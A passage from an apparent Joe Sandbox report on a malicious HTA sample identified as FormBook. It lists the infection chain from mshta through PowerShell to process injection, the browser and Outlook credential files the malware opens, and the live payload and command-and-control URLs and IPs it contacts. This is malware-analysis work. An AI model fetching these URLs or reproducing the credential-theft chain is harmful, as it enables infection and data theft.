                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts11
                      Command and Scripting Interpreter                      		111
                      Scripting                      		512
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services11
                      Email Collection                      		11
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		31
                      Virtualization/Sandbox Evasion                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		4
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts3
                      PowerShell                      		Logon Script (Windows)1
                      DLL Side-Loading                      		512
                      Process Injection                      		Security Account Manager31
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Deobfuscate/Decode Files or Information                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture5
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Abuse Elevation Control Mechanism                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials114
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568211 Sample: bestimylover.hta Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 66 www.sql.dance 2->66 68 www.enoughmoney.online 2->68 70 3 other IPs or domains 2->70 100 Suricata IDS alerts for network traffic 2->100 102 Malicious sample detected (through community Yara rule) 2->102 104 Antivirus detection for URL or domain 2->104 106 12 other signatures 2->106 14 mshta.exe 1 2->14         started        signatures3 process4 signatures5 122 Suspicious command line found 14->122 124 PowerShell case anomaly found 14->124 17 cmd.exe 1 14->17         started        process6 signatures7 80 Detected Cobalt Strike Beacon 17->80 82 Suspicious powershell command line found 17->82 84 Wscript starts Powershell (via cmd or directly) 17->84 86 PowerShell case anomaly found 17->86 20 powershell.exe 3 44 17->20         started        25 conhost.exe 17->25         started        process8 dnsIp9 72 107.172.44.175, 49704, 49709, 80 AS-COLOCROSSINGUS United States 20->72 58 nightridingisreall...lentiretimeforn.vbS, Unicode 20->58 dropped 60 C:\Users\user\AppData\...\hfoj0pnm.cmdline, Unicode 20->60 dropped 110 Loading BitLocker PowerShell Module 20->110 27 wscript.exe 1 20->27         started        30 csc.exe 3 20->30         started        file10 signatures11 process12 file13 114 Detected Cobalt Strike Beacon 27->114 116 Suspicious powershell command line found 27->116 118 Wscript starts Powershell (via cmd or directly) 27->118 120 2 other signatures 27->120 33 powershell.exe 15 16 27->33         started        62 C:\Users\user\AppData\Local\...\hfoj0pnm.dll, PE32 30->62 dropped 37 cvtres.exe 1 30->37         started        signatures14 process15 dnsIp16 64 cloudinary.map.fastly.net 151.101.129.137, 443, 49705 FASTLYUS United States 33->64 96 Writes to foreign memory regions 33->96 98 Injects a PE file into a foreign processes 33->98 39 aspnet_compiler.exe 33->39         started        42 conhost.exe 33->42         started        44 aspnet_compiler.exe 33->44         started        signatures17 process18 signatures19 112 Maps a DLL or memory area into another process 39->112 46 HDLzkMKGEKBh.exe 39->46 injected process20 signatures21 126 Found direct / indirect Syscall (likely to bypass EDR) 46->126 49 msinfo32.exe 13 46->49         started        process22 signatures23 88 Tries to steal Mail credentials (via file / registry access) 49->88 90 Tries to harvest and steal browser information (history, passwords, etc) 49->90 92 Modifies the context of a thread in another process (thread injection) 49->92 94 3 other signatures 49->94 52 HDLzkMKGEKBh.exe 49->52 injected 56 firefox.exe 49->56         started        process24 dnsIp25 74 www.cifasnc.info 172.67.128.109, 49764, 49771, 49777 CLOUDFLARENETUS United States 52->74 76 www.enoughmoney.online 172.67.150.211, 49723, 80 CLOUDFLARENETUS United States 52->76 78 www.sql.dance 199.59.243.227, 49800, 49810, 49816 BODIS-NJUS United States 52->78 108 Found direct / indirect Syscall (likely to bypass EDR) 52->108 signatures26

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      bestimylover.hta18%ReversingLabsScript-WScript.Trojan.Asthma

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF0%Avira URL Cloudsafe
                      http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFFD0%Avira URL Cloudsafe
                      http://107.172.44.175/244/nightr0%Avira URL Cloudsafe
                      http://107.172.44.175/244/RFGDF.txt100%Avira URL Cloudmalware
                      http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF;0%Avira URL Cloudsafe
                      http://cifasnc.info/wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ0%Avira URL Cloudsafe
                      http://www.cifasnc.info/wl1d/0%Avira URL Cloudsafe
                      http://www.sql.dance0%Avira URL Cloudsafe
                      http://www.enoughmoney.online/r72u/?-DiH=2XvD5&CJE8V=GItYwatNh5Xk+Q2MTg9ApsiGHoFk1E90IzupkRdOfJqts8zyaMFRFG2wZpK3L9f87JrBtQZPR7+NA6TbtORZfIe2HAOWLNTCJkmVcfUZGPKfL9xE/oouBrRom1yDfEIfZg==0%Avira URL Cloudsafe
                      http://www.sql.dance/9p84/0%Avira URL Cloudsafe
                      http://www.sql.dance/9p84/?CJE8V=sVrHaezIocwvk586NbKL/ZmiafOvpGHuxCd8uk51gcnLQEXEQAeULabxZfXafDaZqd/22GpcW/h9erqwiYl6Kq4oLeU8CyaDpPEVNRKQpnjvGs8eQi8Qsuigmn/6Gj17jw==&-DiH=2XvD50%Avira URL Cloudsafe
                      http://cifasnc.info/xmlrpc.php0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.enoughmoney.online
                      		172.67.150.211
                      		truetrue
                        		unknown
                        www.sql.dance
                        		199.59.243.227
                        		truetrue
                          		unknown
                          www.cifasnc.info
                          		172.67.128.109
                          		truetrue
                            		unknown
                            cloudinary.map.fastly.net
                            		151.101.129.137
                            		truefalse
                              		high
                              res.cloudinary.com
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFFtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cifasnc.info/wl1d/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://107.172.44.175/244/RFGDF.txttrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.sql.dance/9p84/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.enoughmoney.online/r72u/?-DiH=2XvD5&CJE8V=GItYwatNh5Xk+Q2MTg9ApsiGHoFk1E90IzupkRdOfJqts8zyaMFRFG2wZpK3L9f87JrBtQZPR7+NA6TbtORZfIe2HAOWLNTCJkmVcfUZGPKfL9xE/oouBrRom1yDfEIfZg==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sql.dance/9p84/?CJE8V=sVrHaezIocwvk586NbKL/ZmiafOvpGHuxCd8uk51gcnLQEXEQAeULabxZfXafDaZqd/22GpcW/h9erqwiYl6Kq4oLeU8CyaDpPEVNRKQpnjvGs8eQi8Qsuigmn/6Gj17jw==&-DiH=2XvD5true
                                • Avira URL Cloud: safe
                                		unknown
                                https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabmsinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1545943056.000000000605B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://cifasnc.info/wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZmsinfo32.exe, 00000010.00000002.2659047347.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2658455392.0000000002DA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://107.172.44.175/244/nightrpowershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFFDpowershell.exe, 00000003.00000002.1547598476.00000000077BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.ecosia.org/newtab/msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ac.ecosia.org/autocomplete?q=msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://res.cloudinary.compowershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgtpowershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1544480434.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000004E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1545943056.000000000605B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF;powershell.exe, 00000003.00000002.1547598476.00000000077BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.sql.danceHDLzkMKGEKBh.exe, 00000011.00000002.2660016634.0000000004CD0000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://cifasnc.info/xmlrpc.phpmsinfo32.exe, 00000010.00000002.2659047347.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2658455392.0000000002DA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1544480434.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000004E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                172.67.128.109
                                                                                		www.cifasnc.infoUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                151.101.129.137
                                                                                		cloudinary.map.fastly.netUnited States
                                                                                		54113FASTLYUSfalse
                                                                                107.172.44.175
                                                                                		unknownUnited States
                                                                                		36352AS-COLOCROSSINGUStrue
                                                                                199.59.243.227
                                                                                		www.sql.danceUnited States
                                                                                		395082BODIS-NJUStrue
                                                                                172.67.150.211
                                                                                		www.enoughmoney.onlineUnited States
                                                                                		13335CLOUDFLARENETUStrue

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1568211
                                                                                Start date and time:2024-12-04 13:07:14 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 9m 32s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:19
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:bestimylover.hta
                                                                                Detection:MAL
                                                                                Classification:mal100.phis.troj.spyw.expl.evad.winHTA@23/17@4/5
                                                                                EGA Information:
                                                                                • Successful, ratio: 66.7%
                                                                                HCA Information:
                                                                                • Successful, ratio: 87%
                                                                                • Number of executed functions: 85
                                                                                • Number of non-executed functions: 235
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .hta

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target mshta.exe, PID 4080 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: bestimylover.hta

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                07:08:15API Interceptor105x Sleep call for process: powershell.exe modified
